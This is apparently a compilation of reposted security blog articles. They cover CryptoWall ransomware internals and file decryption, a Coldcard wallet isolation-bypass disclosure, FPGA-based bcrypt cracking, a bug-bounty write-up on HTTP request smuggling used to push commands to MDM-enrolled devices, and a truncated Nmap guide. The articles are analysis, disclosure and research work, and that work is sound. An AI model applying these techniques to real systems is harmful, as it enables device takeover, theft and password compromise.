The hexadecimal value of 0x6610 shown above tells us that the generated key is going to be AES-256 as seen in MS-DOCS. Once the hKey address to which the function copies the handle of the newly generated key is populated, CryptGetKeyParam will be used to make the key and transfer it into pbData; a pointer to a buffer that receives the data. One last call in this function we labeled as GenerateAESKey() gets called which is CryptExportKey. This will take the handle to the key to be exported and pass it the function, and the function returns a key BLOB. The second parameter of the GenerateAESKey() will hold the aes_key.

Image for post

The next call is one of the most important ones to understand how eventually we can decrypt the files that CryptoWall infected. EncryptAESKey() uses the pointer to DuplicateKeyStruct->rsa_key to encrypt our AES key into a 256 byte blob. Exploring inside this function call is fairly simple; it uses CryptDuplicateKey and CryptEncrypt to take our public RSA 2048-bit key from earlier, our newly generated AES key to duplicate both keys to save for later, and encrypt the buffer. The fifth parameter is our data out in this case and once the function returns, what we labeled as encrypted_AESkey_buffer will hold our RSA encrypted key.

At around address 004124A5, you will see two calls to WriteFileA. The first call will move the 16 byte MD5 hash at the top of the victim file, and the second call will write out the 256 bytes of encrypted key buffer right below the hash.

Image for post
Screenshot shows 128 byte encrypted key buffer, but it was a copy mistake; Supposed to be 256 bytes of encrypted key text.

The picture above shows what an example file will look like up until this stage of the infection. The plaintext is still intact, but the headers now hold the hash of the file and the encrypted AES key used to encrypt the plaintext in the next phase. ReadFileA will shortly get called at 0x0041261B, which will read out everything after the header of the file to start the encryption process.

Image for post

Now that 272 bytes belong to the header, anything after that we can assume is free range for the next function to deal with. We don’t really need to deep dive too much into what DuplicateAESKey_And_Encrypt() does as it is pretty self explanatory. The file contents are encrypted using the already generated AES key from above that was passed into the HCRYPTKEY *hKey variable. The sixth parameter of this function is the pointer which will contain the encrypted buffer. At this point the ransomware will replace the plaintext with an encrypted blob, and the AES key is free’d from memory.

Image for post
Example of a fully encrypted file

After the file is finished being processed, the loop will continue until every allow listed file type on disk is encrypted.

Decrypting Victim Files

Unfortunately in this case, it is only possible to write a decryption algorithm if you know the private key used which is generated on the C2 side. This is going to be a two step process as in order to decrypt the file contents, we need to decrypt the AES key that has been RSA encrypted.

The fake C2 server I wrote also includes an area where a private key is generated at the same time that the public key is generated. So in my case, all encrypted files on my VM are able to be decrypted.

Side Note: In order to run this C2 server, you have to place the malware’s hardcoded I2P addresses in /etc/hosts on Windows. Then make sure the server has started before executing the malware as there will be a lot of initial verification going back and forth between the malware and ‘C2’ to ensure its legitimacy. Your file should look like this:

127.0.0.1 proxy1-1-1.i2p
127.0.0.1 proxy2-2-2.i2p

Another reason why we un the fake C2 server before executing the malware is so we don’t end up in some dead lock state. The output from our server will look something like this:

C:\CryptoWall\> python.exe fake_c2_i2p_server.py

* Serving Flask app "fake_c2_server" (lazy loading)
127.0.0.1 - - [31/Mar/2020 15:10:06] "�[33mGET / HTTP/1.1�[0m" 404 -

Data Received from CryptoWall Binary:
------------------------------
[!] Found URI Header: 93n14chwb3qpm
[+] Created key from URI: 13349bchmnpqw
[!] Found ciphertext: ff977e974ca21f20a160ebb12bd99bd616d3690c3f4358e2b8168f54929728a189c8797bfa12cfa031ee9c2fe02e31f0762178b3b640837e34d18407ecbc33
[+] Recovered plaintext: b'{1|crypt1|C6B359277232C8E248AFD89C98E96D65|0|2|1||55.59.84.254}'

[+] Sending encrypted data blob back to cryptowall process
127.0.0.1 - - [31/Mar/2020 15:11:52] "�[37mPOST /93n14chwb3qpm HTTP/1.1�[0m" 200

Step by step, the first thing we have to do is write a program that imports the private key file. I used C++ for this portion because for the life of me I could not figure out how to mimic the CryptDecodeObjectEx API call that decodes the key in a X509_ASN_ENCODING and PKCS_7_ASN_ENCODING format. Once you have the key blob from this function, we can use this function as the malware does and call CryptImportKey, but this time it is a private key and not a public key ;). Since the first 16 bytes of the victim file contains the MD5 hash of the unencrypted file, we know we can skip that part and focus on the 256 bytes after that part of the header. The block size is going be 256 bytes and AES offset will be 272, since that will be the last byte needed in the cryptographic equation. Once we get the blob, it is now okay to call CryptDecrypt and print out the 32 byte key blob:

if (!CryptDecrypt(hKey, NULL, FALSE, 0, keyBuffer, &bytesRead))  
{
printf("[-] CryptDecrypt failed with error 0x%.8X\n",
GetLastError());
return FALSE;
} printf("[+] Decrypted AES Key => ");
for(int i = 0; i < bytesRead; i++)
{
printf("%02x", keyBuffer[i]);
}

You can find the whole script here. Now that we are half way there and we have an AES key, the last thing to do is write a simple python script that will take that key / encrypted file and decrypt all remaining contents of it after the 272nd byte.

enc_data_remainder = file_data[272:]
cipher = AES.new(aes_key, AES.MODE_ECB)
plaintext = cipher.decrypt(enc_data_remainder)

The script to perform this action is in the same folder on Github. If you want to see how the whole thing looks from start to finish, it will go like this:

➜  decrypt_aes_key.exe priv_key_1.pem loveme.txt
[+] Initialized crypto provider
[+] Successfully imported private key from PEM file
[!] Extracted encrypted AES keys from file
[+] Decrypted AES Key => 08020000106600002000000040b4247954af27637ce4f7fabfe1ccfc6cd55fc724caa840f82848ea4800b320
[+] Successfully decrypted key from file

➜ python decrypt_file.py loveme.txt 40b4247954af27637ce4f7fabfe1ccfc6cd55fc724caa840f82848ea4800b320
[+] Decrypting file
[+] Found hash header => e91049c35401f2b4a1a131bd992df7a6
[+] Plaintext from file: b'"hello world" \r\n\'

Conclusion

Overall this was one of the biggest leading cyber threats back in 2013, and the threat actors behind this malicious virus have shown their years of experience when it comes to engineering a ransomware such as this.

Although this ransomware is over 6 years old, it still fascinated me so much to reverse engineer this virus that I wanted to share all the tooling I have wrote for it. Every step of the way their was another challenge to overcome, whether it was knowing what the malware expected the encrypted payload to look like coming back from the C2, figuring out how to decrypt their C2 I2P servers using RC4, decompressing the ransomware note using some hard to mimic LZNT1 algorithm, or even understanding their obscure way of generating domain URI paths… it was all around a gigantic puzzle for a completionist engineer like myself.

Here is the repository that contains all the programs I wrote that helped me research CryptoWall.

Thank you for following along! I hope you enjoyed it as much as I did. If you have any questions on this article or where to find the challenge, please DM me at my Instagram: @hackersclub or Twitter: @ringoware

Happy Hunting 🙂

Coldcard isolation bypass

Coldcard isolation bypass

Original text by benma

Coldcard isolation bypass

Shift Crypto responsibly disclosed the remote exploit to Coinkite (Coldcard) on August 4th, 2020, and mutually agreed to a 90-day disclosure embargo period. Coinkite created a fix on September 30th but, as of this date, have not yet released a firmware update to mitigate against potential exploits in the wild. The fix on September 30th explicitly described the issue and attack scenarios in the changelog, and the 90-day embargo period, including requested extensions, has lapsed. Therefore, we now disclose the issue, and we encourage Coldcard users to take appropriate precautions until an update is available.


The original issue

On August 4th 2020, @mo_nokh disclosed a vulnerability in the Ledger hardware wallets in which a user could unknowingly confirm a Bitcoin transaction that was masquerading as an altcoin or testnet transaction:

An attacker can exploit this method to transfer Bitcoin while the user is under the impression that a transaction of another, less valuable altcoin (e.g. Litecoin, Testnet Bitcoins, Bitcoin Cash, etc.) is being executed

A quick high-level summary of how this is possible:

When you create a transaction proposal on your computer, the transaction is sent to the hardware wallet to be confirmed by the user and formally signed. The computer also tells the hardware wallet what kind of coin we are dealing with, e.g. “this is a Litecoin transaction, please show the amounts as Litecoin and display the addresses in Litecoin’s address formats”. The hardware wallet will just take that info, and show, for example “Sending 1 LTC to ltc1…”.

Litecoin, Bitcoin, their testnets and some other coins all have the exact same transaction representation under the hood. For example, there is nothing in a Bitcoin transaction that says it is a Bitcoin transaction and not a Litecoin transaction. From a hardware wallet’s point of view, a valid Litecoin transaction proposal is also a valid Bitcoin transaction proposal.

As a consequence, a compromised wallet on the computer can simply create a transaction spending bitcoins to the attacker, and send it to the hardware wallet as a Litecoin transaction. The user will only see Litecoin information on the device (addresses in Litecoin’s address format, amounts denominated in Litecoin, etc) while not suspecting that they are in fact sending bitcoins.

The problem is mitigated by allocating separate private keys to separate coins, as described by BIP44. If all your bitcoins use one set of private keys, and all your litecoins use a different set of private keys, then signing a Litecoin transaction with Litecoin keys can never spend actual bitcoins. The BitBox02 has always enforced this key separation strictly.

Coldcard

When the isolation bypass vulnerability was disclosed, Coldcard responded quickly that they were not affected:

This, unfortunately, was not true. While the Coldcard does not support “shitcoins”, it does support testnet. A quick test confirmed that the Coldcard was in fact vulnerable in the exact same way as Ledger. A user confirming a testnet transaction on the device could be spending mainnet (i.e. the real thing) funds without their knowledge.

For example, this real mainnet transaction:

…is confirmed and signed like this when sending the same real mainnet transaction to the Coldcard while it is in testnet mode:

Impact and severity

As a hardware wallet user, you should assume your computer is compromised. That is the reason to use a hardware wallet in the first place. Starting from there, exploiting this attack is not very far fetched. The attacker merely has to convince the user to e.g. “try a testnet transaction”, or to buy an ICO with testnet coins (I’ve heard there was a ICO like this recently) or any number of social engineering attacks to make the user perform a testnet transaction. After the user confirms a testnet transaction, the attacker receives mainnet bitcoin in the same amount.

Since the attack can be performed remotely, it counts as a critical issue according to Shift’s security assessment guideline. Severity points are deducted as the attack does not scale very well:

  • the device has to be unlocked and user interaction is required
  • the attacker has to convince the user to make a testnet transaction to the attacker’s testnet address

Credit

I did not discover the isolation bypass attack, all credit goes to @mo_nokh, who published the original attack on the Ledger. After reading about it, I remembered that the Coldcard has testnet support. I quickly built a proof-of-concept to see if this attack is feasible. Seeing that it indeed is, I immediately responsibly disclosed the issue to the Coldcard team.


Disclosure timeline:

  • The issue was responsibly disclosed to Coinkite on Aug. 4th, 2020.
  • Coinkite acknowledged the issue on Aug. 5th and asked for 90 days to fix the issue.
  • Coinkite created a fix on Sept. 30th, publicly disclosing the issue and attack scenario in the changelog:
    https://github.com/Coldcard/firmware/pull/49/files
  • Noticing the fix, on Oct. 14th we asked when to expect a firmware release. Coinkite informed that additional items are being added in advance of the next firmware release.
  • On Nov 12th, one week beyond the embargo period, we asked again when to expect a firmware release and gave notice that we would release our disclosure soon. Coinkite informed that the release would be further delayed, but imminent, as additional items were being included.
  • On Nov 21st, we informed Coinkite that we would publish our disclosure on Nov 24th.
  • On Nov 23rd, Coldcard published a BETA version of the next firmware with the fix included:
    https://github.com/Coldcard/firmware/tree/master/releases

Discuss on Reddit.

Originally published at https://benma.github.io.

AMD laptops have a hidden 10-second performance delay. Here’s why

AMD laptops have a hidden 10-second performance delay. Here’s why

Original text by L33TDAWG

Arstechnica

In an embargoed presentation Friday morning, Intel Chief Performance Strategist Ryan Shrout walked a group of tech journalists through a presentation aimed at taking AMD’s Zen 2 (Ryzen 4000 series) laptop CPUs down a peg.

Intel’s newest laptop CPU design, Tiger Lake, is a genuinely compelling release—but it comes on the heels of some crushing upsets in that space, leaving Intel looking for an angle to prevent hemorrhaging market share to its rival. Early Tiger Lake systems performed incredibly well—but they were configured for a 28W cTDP, instead of the far more common 15W TDP seen in production laptop systems—and reviewers were barred from testing battery life.

This left reviewers like yours truly comparing Intel’s i7-1185G7 at 28W cTDP to AMD Ryzen 7 systems at half the power consumption—and although Tiger Lake did come out generally on top, the power discrepancy kept it from being a conclusive or crushing blow to AMD’s increasing market share with the OEM vendors who are actually buying laptop CPUs in the first place.

Bcrypt password cracking extremely slow? Not if you are using hundreds of FPGAs!

Bcrypt password cracking extremely slow? Not if you are using hundreds of FPGAs!

Original text by ScatteredSecrets.com

Image for post

Cracking classic hashes

Moore’s law is the observation that the number of transistors in a dense integrated circuit doubles about every two years. This roughly doubles computing power about every two years as well. Password hashing algorithms typically have a lifetime of many decades. This means that the level of protection of a given password hash algorithm decreases over time: attackers can crack longer and more complex passwords in the same amount of time.

The introduction of powerful Graphics Processing Units (GPUs) and supporting software frameworks revolutionized password cracking. Starting over a decade ago, high performance GPU password cracking tools were published, massively outperforming Central Processing Units (CPUs) that were typically used for password cracking at the time. The speed-up was a factor of 50 to 100 for many algorithms: another big step back for the protection level of your passwords. The impact of the combination of Moore’s law and the introduction of GPUs is massive.

Let us take a closer look at a classic password hashing algorithm that was very popular a decade ago and still is in use today: MD5. The hash rate —the number of passwords that can be guessed — on an decade old AMD Phenom II X4 965 CPU was about 95M hashes per second. On a recent Nvidia RTX 2080Ti high-end GPU, the hash rate is about 54,000M hashes per second: about a factor 570 faster. Similar speed-ups can be seen for other classic password hashing algorithms like SHA-1 and SHA-2. It is clear that classic password hashing algorithms are losing the battle. And it is clear that the GPU is the weapon of choice for cracking classic password hashes.

Advanced hashes

Some password hash designers recognized the importance of designing algorithms that could cope with ever increasing computing power. They introduced two new characteristics: a variable iteration count and memory hardness.

Using a variable iteration count is a way to make password cracking more time consuming by requiring repeated hashing. The number of rounds for repeated hashing is configurable. This allows the algorithm to stay resistant to password cracking attacks even if computation power significantly increases: if computing power doubles the iteration count can also be doubled, resulting in a similar hash rate.

Memory hardness is used to slow down specific hardware platforms by using a relatively large amount of memory to calculate a password hash. If the amount of required memory is higher than the amount of local fast memory available to the computing core (‘level 1 cache’), the computing core needs to wait for data from slower memory. This will result in a significant drop in performance. For some memory hard algorithms the required amount of memory is fixed. If the cracking platform has more level 1 cache on board, the algorithm’s countermeasure is ineffective. For other algorithms, the memory usage is variable and can simply be set to a value higher than the amount available in the most potent attack platform. This value can be updated over time. So having more computing power only is not good enough to accelerate password cracking, the platform also needs enough fast memory to fit the entire algorithm in.

In the last decades, a number of advanced password hashing algorithms was introduced. The most well-known ones are bcrypt (1999), scrypt (2009) and Argon2 (2015). All use a configurable iteration count. Memory usage of bcrypt is fixed, the others also support configurable memory usage.

Meet bcrypt

Scattered Secrets is a password breach notification and prevention service. We continuously collect publicly available hacked databases and try to crack the corresponding passwords. The majority of breached databases we encounter contain classic hashes, but the number of databases that contain advanced hashes is increasing — typically deploying bcrypt hashes. Even though both scrypt and Argon2 are better choices because of the configurable memory usage, it seems that those two are not used on a large scale yet.

Taking a closer look at bcrypt hashes, we see that the configurable iteration count in bcrypt is called the ‘work factor’. The work factors we see in the wild vary between 7 and 14, meaning between 2⁷ = 128 and 2¹⁴ = 16,384 iterations.

Image for post

Let us check the hash rates for all real-life work factors on both an AMD EPYC 7401P and an Nvida RTX-2080Ti, a CPU and a high-end GPU with comparable prices. For completeness, work factor 5 is also included, since this is the de-facto standard for benchmarking purposes.

Image for post
Figure 2: bcrypt hash rates, CPU versus GPU

It is clear that the hash rate on both CPU and GPU is extremely low compared to the 54,000M hashes per second for MD5 on a GPU.

It is also clear that the memory hardness of the 1999 algorithm is still good enough in 2020 to slow GPUs down: the 50 to 100 times advantage over the CPU is completely gone. The reason is obvious if you take a closer look at the internals of bcrypt and the specifications of the heart of the GPU, in this case the Turing TU102. Bcrypt needs over 4 kilobyte of fast memory to run at full speed. The TU102’s 4,352 cores have only 1 kilobyte of level 1 cache available per core, meaning that the cores are spending a lot of time waiting for access to slower memory. In contrast, the used CPU has a level 1 cache of 96 kilobyte (32 kB for data, 64 kB for instructions) per core, so no delays there.

Conclusion? Cracking bcrypt hashes on a CPU or GPU is not very effective. Anything other than a very basic dictionay attack is unfeasable. We need something different.

FPGAs to the rescue

Field Programmable Gate Arrays (FPGAs) are chips that can be programmed for a special application after manufacturing. Unlike a CPU or GPU, FPGAs do not run code. Instead an FPGA is the code, build in hardware. This means that FPGAs can be programmed as dedicated optimized password hashing circuitry. Although FPGA clock speeds are significantly lower than those of CPUs and GPUs — typically hundreds of Megahertz versus a few Gigahertz — the dedicated circuitry runs more efficiently. This is true for both performance per Megahertz and performance per Watt.

The first commercial FPGA-based crackers were available in the mid 2000s. It took many years before the first free and open source password crackers became available. In 2016, the community enhanced version of John The Ripper started supporting the ZTEX 1.15y: quad Spartan-6 LX150 FPGA boards that were quite popular for mining cypto currency in earlier years. With the release of version 1.9.0-jumbo-1 in 2019, John The Ripper officially added support for 7 hash types including bcrypt. Although the boards — introduced in 2011 — are not using the latest generation of FPGAs, they are good enough to run 124 optimized bcrypt cores per FPGA. This results in a high bcrypt hash rate: higher than the hash rate of the latest generation of high-end GPUs:

Image for post
Figure 3: bcrypt hash rates

A single quad FPGA board from 2011 outperforms a latest generation RTX-2080Ti GPU with factor of over 4. For Scattered Secrets it was clear that using john with the ZTEX boards was the way forward for bcrypt cracking.

From proof of concept to production v1

The ZTEX 1.15y board is a discontinued product. Although the boards were popular for crypto currency mining, the availability on the second hand market was and is limited. Finding boards was a challenge. It took us almost two years of monitoring several online market places until we were able to find boards at large quantities. Once found, buying the devices was challenging as well. Sellers typically want to stay anonymous so checking trustworthiness is an issue. Hardware escrow? Coming from professional corporate environments the processes used looked… interesting… to us. The only accepted payment method? Crypto currency. Testing or pick-up in person? No way. All ingredients of a good scam. No guts no glory, after transferring Bitcoins to our anonymous friends, we have aquired a large number of boards of which almost all were in working condition.

In early 2019 we built out first FPGA cracker, based on 12 ZTEX boards and an Intel J4005 based PC. This machine was mainly used for testing the concept for large scale deployment in production.

Image for post
Figure 4: proof of concept / production v1 setup

We used 12 FPGA boards for a number of practical reasons. First of all, 12 devices can be connected using two of the shelf USB hubs, so switching hardware during testing or in case of issues in production does not require waiting for shipments of exotic products and is inexpensive. Secondly, 12 devices can be easily build into an off the shelf 4U case by non-experts. Thirdly, common specs power supplies can be used.

The initial system design was performing surprisingly well: FPGA performance scaled perfectly, system cooling performed above expectation, the controller PC had more than enough computing power to keep all FPGAs busy and the system was stable. After a two month test period and some minor upgrades, the first v1 system was put into production and has so far been running without noticeble issues.

Image for post
Figure 5: from zero to (datacenter) hero

Production v2

With the high bcrypt hash rate of the now proven concept, it was clear that using more FPGA-based crackers was on top of our wishlist. Preparations started as soon as the first v1 system was in production. To maximize performance per system and to professionalize construction, we contacted an instrument maker. His design simplified the setup and added another 6 FPGA boards per system, totaling at 18 boards / 72 FPGAs now.

Image for post
Figure 6: simplified design with 6 boards per row (x3 rows)

The hardware setup is very similar to the v1 design: the only major changes include a more powerful and more efficient power supply and exotic USB many port hubs to connect all 18 FPGA boards to the controller PC using two USB hubs.

Image for post
Figure 7: the first completed production v2 setup

The number of issues was quite limited. Problems were mainly related to the USB hubs. It seems that some USB hubs require more power than the PC mainboard can provide. Other USB hubs were unreliable: USB connectivity dropped during longer test runs. Finally, specifications of some Chinese manufacturers were incorrect, not providing USB 2.0 (480 Mbps) links as promised, but USB 1.1 (12 Mbps) which is too slow to keep the FPGAs working at full speed. Thorough testing showed that HS8836-based hubs were the most reliable.

Image for post
Figure 8: USB chips

After some minor design updates, the first v2 system was ready. Three clones quickly followed. After successful burn-in tests, the first set of four v2 systems was moved to production in late 2019.

Image for post
Figure 9: a new set of bcrypt v2 crackers ready for production

A picture of a stack of FPGA crackers posted on social media resulted in a number of questions. Most questions are answered above. The most important ones are not: what is the hash rate and what is the power usage of one of the bcrypt crackers? Here you go:

Image for post
Figure 10: performance and power usage of a v2 cracker

To translate the figures to GPU performance: to match the bcrypt crunching power of a single v2 cracker, you need about 75 to 80 Nvidia RTX-2080Ti GPUs. That is one FPGA-based machine versus a server rack full of GPU-based systems, burning about 25 kilowatts of power! So FPGA-based cracking is not only fast, it is also relatively economical to run.

After running many FPGA-based systems for months in production now, we have cracked an enormous number of bcrypt hashes that were previously practically uncrackable using conventional hardware. This allows us to generate a lot of quality content, allowing our clients to protect their accounts against account takeover with our unique intel. Scattered Secrets ♥ passwords 😉 Don’t forget to check if your passwords are breached!

Edit Aug-2020: original GPU benchmarks were based on hashcat 5.1.0 using OpenCL. Since publication, hashcat’s bcrypt performance was improved significantly and hashcat 6 was introduced, using CUDA. As a result, the bcrypt hash rate for work factor 5 on hashcat 6.1.1 using CUDA on a RTX 2080Ti is now ~53k/s instead of the original ~28k/s.

The Powerful HTTP Request Smuggling

The Powerful HTTP Request Smuggling

Original text by Ricardo Iramar dos Santos

TL;DR: This is how I was able to exploit a HTTP Request Smuggling in some Mobile Device Management (MDM) servers and send any MDM command to any device enrolled on them for a private bug bounty program.

Image for post
I am inevitable

What is HTTP Request Smuggling? 📖

If you already know what is HTTP Request Smuggling you can skip this section but if you want to know the basics I’d recommend read carefully.

In this section I’ll try to put everyone under the same page covering only the basics about HTTP Request Smuggling. If you want to learn in details I recommend you read this documentation https://portswigger.net/web-security/request-smuggling, read all the references and do all the labs.

In August 2019 when James Kettle brought HTTP Request Smuggling back from the ashes I tried to understand this vulnerability and at that time it was difficult to me understand everything.

Now after exploiting a few instances I see the problem to understand at the first glance. Most of the time we are looking for a vulnerability on the application and HTTP Request Smuggling also involves another layer called network.

The images from now one in this section are from this YouTube video “$6,5k + $5k HTTP Request Smuggling mass account takeover — Slack + Zomato”. Thanks Grzegorz Niedziela for allowing me to use the images! I strong recommend you to watch this video after reading this post.

Before talking about HTTP Request Smuggling itself lets recap some features from HTTP protocol version 1.1. A HTTP server can process multiple requests under the same TCP connection as you can see in the example below.

Image for post

The header Content-Length defines the size of the body which tells to the server where the body finishes. There is another header called Transfer-Encoding which also defines the size of the body.

Image for post

The Transfer-Encoding header indicates the body will be sent in chunks and the numbers in the beginning of each chunk indicates the size of it in a hexadecimal format. The last chunk should be indicate with number 0 which determines the end of the body.

The main difference between Content-Length and Transfer-Encoding is in the first case the request send the entire body at once and on Transfer-Encoding the body is sent in pieces.

But what happen when both headers are present?

Image for post

The RFC 2616 is clear on section 4.4 Message Length page 34 about it.

If a message is received with both a Transfer-Encoding header field and a Content-Length header field, the latter MUST be ignored.

RFC describes the beauty of the theory but this is not what happen in practice. When an environment do not respect the sentence above the HTTP Request Smuggling is possible.

Nowadays is pretty common to see web applications in the back-end and a reverse proxy in the front-end like the diagram below.

Image for post

What happen if Bob sends a request with Content-Length and Transfer-Encoding and front-end and back-end interprets these headers in a different order ignoring RFC 2616? Let’s assume Alice also sends a request right after Bob with only the Content-Length header.

Image for post

In the image above we can see Bob and Alice requests one next to another. The Bob’s request comes first and the front-end is using the Content-Length header (ignoring Transfer-Encoding) to defines the body length which means for the front-end Bob’s request ends right after the text key=value and Alice’s request starts at POST / HTTP/1.1.

In the other side back-end is using Transfer-Encoding header (ignoring Content-Length) and defining the end of Bob’s request at the number 0 and assuming the Alice’s requests starts with the text key=value which is an invalid request.

If Bob is a skilled attacker he can craft a malicious request and force Alice to receives a different response from what was supposed to be the original response from Alice’s request.

That’s the most important part of HTTP Request Smuggling. If you didn’t get what is happening here I strong recommend you go back and read everything again.

Reporting HTTP Request Smuggling📝

I was scanning some subdomains using Smuggler in a private bug bounty program on Hackerone when I initially found 13 subdomains reported as potential vulnerable to HTTP Request Smuggling by Smuggler. I reported all of them in one single report as critical even without a real PoC because I was afraid to get a duplicate and decided to work on the impact later. I got that felling there was something big which would require time to investigate.

If you already ran Smuggler before you probably know most of the time Smuggler reports as potential vulnerable but you cannot really get any real impact directly. For each case a research is required to understand the context and test a malicious scenario to prove the impact.

The most common impact that I’ve seen it is what I called as Universal Redirect. Universal Redirect is when you can force any user to receive a malicious response which actually redirects the user to another domain.

As usual the Hackerone triager asked me for a PoC with a valid impact which is a fair enough request. From those 13 subdomains reported as potential vulnerable I was able to quickly found one vulnerable to Universal Redirect by just sending the request below.

Image for post

The request above was pointed to one of the 13 subdomains. Since I cannot reveal anything regarding the company let’s say the requests was actually made to https://vulnerable.requestsmuggling.com. As you can see instead of using vulnerable.requestsmuggling.com on the Host headers I’ve changed to www.example.com in order to get a redirect in the response pointed to it.

By playing the attacker with the request above the luckiest next user making any request to https://vulnerable.requestsmuggling.com would receive the response below generated by my malicious request.

Image for post

Without knowing what is happening and totally transparent the next user would be magically redirected to https://www.example.com/getfile/. If I keep sending the same request described above I’d be able to redirect almost all the users to a domain that I control.

After been able to demonstrate the Universal Redirect above I also found other 4 subdomains (17 subdomains in total) identified as vulnerable by Smuggler and included them under the same report. At that time I didn’t look closely to these 4 new subdomains. The Hackerone triager accepted my report and downgrade the severity from critical (9.1) to high (7.5) which later on the company changed from high (7.5) to critical. 🤷‍♂️

As soon as my report was validated I asked permission to try other scenarios which could affect real users and got this answer below from the Hackerone triager.

I passed your report to the company team, please don't perform any activity that might affect live users before hearing back from the team.

HTTP Request Smuggling is really powerful and if you don’t what you doing you can impact all the users. I just continued with my investigation to see what else impact I could prove with all those instances.

The First Bounty 💰

After four days from the date that I opened the report someone from company commented in the report asking for more details how to reproduce for a specific subdomain and as much as possible to avoid test on production subdomains. By the subdomain names it was easy to identify which subdomains were production and which were not.

After providing all the details how to reproduce the Universal Redirect for one subdomain I was rewarded with a US$2,000 bounty. In order to elevate the bounty I checked all the subdomains and from those 17 subdomains I was able to demonstrate the Universal Redirect only for 7 subdomains.

I didn’t agree with the bounty because I knew it with those 7 vulnerable subdomains I could cause a big impact in their business by just redirecting all the users to a malicious domain. I complained through the comments and got the comment below from the company.

The bounty payment was based on the number of unique systems affected and the maximum perceived impact of the vulnerability (redirection).

That is fair enough, I decided to take a close look on the others 10 subdomains to see what I could get from them.

Trying Harder ⚔️

I tried for a few days to get some impact on those 10 subdomains but got nothing. I was trying harder because some of them subdomain names had api in the middle. If I could redirect the traffic from those APIs to another domain under my control maybe I could get some sensitive information.

After trying everything I decided to go back to the other 7 subdomains to check if I was missing something and the subdomain mdm.qa-vulnerable.requestsmuggling.com took my attention.

A few months back I had some experience working with a Mobile Device Management (MDM) solution and I knew it a little bit about the MDM protocol so I decided to investigate more in details the subdomain mdm.qa-vulnerable.requestsmuggling.com. I was really comfortable to work on this subdomain since the name was clear saying this is a QA environment.

First step was redirect a random request to Burp Collaborator to see if I could get a request from a random user and analyze it. I’ve created my payload, sent the request below and waited.

Image for post

After a few seconds I was able to see the request below in my Burp Collaborator.

Image for post

By the request headers “Content-Type: application/x-apple-aspen-mdm”, “Mdm-Signature: …” and “User-Agent: MDM/1.0” we can assume this request came from a MDM client. A quick google search returned the Mobile Device Management Protocol Reference document as the first hit.

Image for post

After the enrollment the devices start to listen for a push notification from the server. To cause the device to poll the MDM server for commands, the MDM server sends a notification through the APNS gateway to the device. The message sent with the push notification is JSON-formatted and must contain the PushMagic string as the value of the mdm key.

Since I didn’t have the mdm key and I’m not sure if we could send a notification through the APNS gateway to the device I’ve checked what happen next. The device responds to this push notification by contacting the MDM server using HTTP PUT over TLS (SSL) which matches with our Burp Collaborator request. This message may contain an Idle status or may contain the result of a previous operation. I though the requests that I was seeing on Burp Collaborator were Idle status since it was Sunday so I didn’t think anyone was sending commands to devices in a QA environment.

From the documentation we can see the MDM clients follow HTTP 3xx redirections without user interaction and in case of mdm.qa-vulnerable.requestsmuggling.com there is no client certificate authentication since we can see the header Mdm-Signature on the request.

If your MDM server is behind an HTTPS proxy that does not convey client certificates, MDM provides a way to tunnel the client identity in an additional HTTP header. If the value of the SignMessage field in the MDM payload is set to true, each message coming from the device carries an additional HTTP header named Mdm-Signature.

Image for post

My attack scenario was based in the way the MDM protocol works. From the documentation we can see after execute one command a device will wait for the server finish the process or sending more commands.

Image for post

In theory I could inject a redirection and replace the server response that pretends to finish the process and redirect the device to a fake MDM server which would send another command instead. To do that I got the example below from the document which sends a command to install an application on the device.

Image for post

As you can see from the documentation the user needs to accept the request in order to install the application. Since the attack is kind of blind I created a test Python server and hosted under https://myattackerdomain.com with the example above and add the parameter ManifestURL pointing to Burp Collaborator to see if I’d receive any feedback which unfortunately it didn’t happen.

After running my fake server for a few minutes and perform the attack pointing the redirection to https://myattackerdomain.com/api I was able to see just a few requests coming to my server. I’m not sure if these requests were coming from real MDM devices and since it was a QA environment I didn’t think there was much traffic from devices to the server.

Image for post

I was afraid to violate their policy so I decided to stop and send all the information above to the company and after that I got the answer below.

If you are able to prove that the vulnerability can be used for more than redirection, like gaining access to sensitive information, we can re-evaluate the reward.

No Retreat! No Surrender! 🥋

I decided to give a try on production since I wasn’t seeing much traffic in any other server. I did the same attack as before but now on mdm.prod-vulnerable.requestsmuggling.com and I got the response from the devices for valid server commands.

I also did a little improvement in my server to print the requests and reply with a response for the “ProfileList” command using this documentation as example. The screenshot below is from this python BaseHTTP server.

Image for post

In order to prove that I could execute MDM commands I got a valid CommandUUID from one of the outputs and changed one letter to be sure it would be a unique CommandUUID and did the same attack again.

By keep doing the same attack I got another request (which is the command response to the server) with the exactly same CommandUUID from my payload proving that I was able to execute the ProfileList MDM command in any client.

At this point there was nothing else to attack so I included everything in my report and started to press F5 waiting for the response below.

Alright! I think this proves your point much better. Based on the impact even just testing can have on active devices, please stop testing this while we investigate further.

After that the company asked a few questions about the attack and one thing that I highlighted to them was about the clients following the redirects. The RFC 2616 states it should send the data through the redirect URL but the user agent MUST NOT automatically redirect the request unless it can be confirmed by the user.

In the MDM context it would be impracticable for a user accept all possible redirects that’s why in the MDM documentation it’s describing the 301 redirect will be automatically followed but it won’t be remember it. I have no idea why the clients needs to blindly follow the redirects.

Image for post
Image for post

After some days when everything was confirmed as fixed I was rewarded with the maximum payout US$15,000 bounty and a US$50 bonus. In total I got US$17,050 for this report. 🤑

The company was really nice and also told me they created a lab to test the same attack but using the EraseDevice command. Below you can check their on comments about the results.

A few seconds later, we hear on the call the iPad had rebooted and was showing a progress bar. About a minute later, the iPad rebooted again and showed the default iOS setup screen. A complete device wipe!

Bonus Track 🏆

After receiving the bounty I asked the company if I could publish this post of course without mention their name or anything related to their company. They replied back saying to wait for a few days because some vendors were involved and they wanted to check if others costumers could have the same problem.

It took more than few days but finally I got the answer below.

Good news! Citrix has released their security bulletin and have credited you in it, as well as in their hall of fame!Bulletin - https://support.citrix.com/article/CTX281474
Hall of Fame - https://www.citrix.com/about/trust-center/vulnerability-process.htmlYou should be all set to go ahead and publish your report.
Image for post
Image for post

Unfortunately Citrix doesn’t have any bug bounty program but at least I was recognized in their portal.

If you have any question or want to share any interesting technique about HTTP Request Smuggling please send email to ricardo.iramar@gmail.com or contact me on twitter @ricardo_iramar.

Deep Dive Into Nmap Scan Techniques

Deep Dive Into Nmap Scan Techniques

Original text by PenTest-duck

Disclaimer: I won’t be covering “every” scan type (e.g. -sY, -sM), but I’ll cover the scan types that I think will be used more often.
A More Serious Disclaimer: using Nmap against a target or network without explicit permission is illegal and should therefore not be attempted.

Introduction

Image for post

nmap -h SCAN TECHNIQUES output

